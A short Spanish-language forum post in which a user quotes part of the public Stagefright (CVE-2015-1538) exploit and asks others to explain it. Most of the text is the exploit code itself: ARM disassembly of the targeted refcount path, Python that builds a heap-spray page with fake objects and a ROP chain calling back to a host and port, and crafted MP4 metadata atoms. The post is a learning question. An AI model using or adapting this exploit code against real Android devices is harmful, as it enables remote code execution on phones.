Hola estoy intentado entender el código de https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/ (https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/)
No entiendo esta parte
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
Alguien que ha mirando un poco el código me lo puede aclarar?
Gracias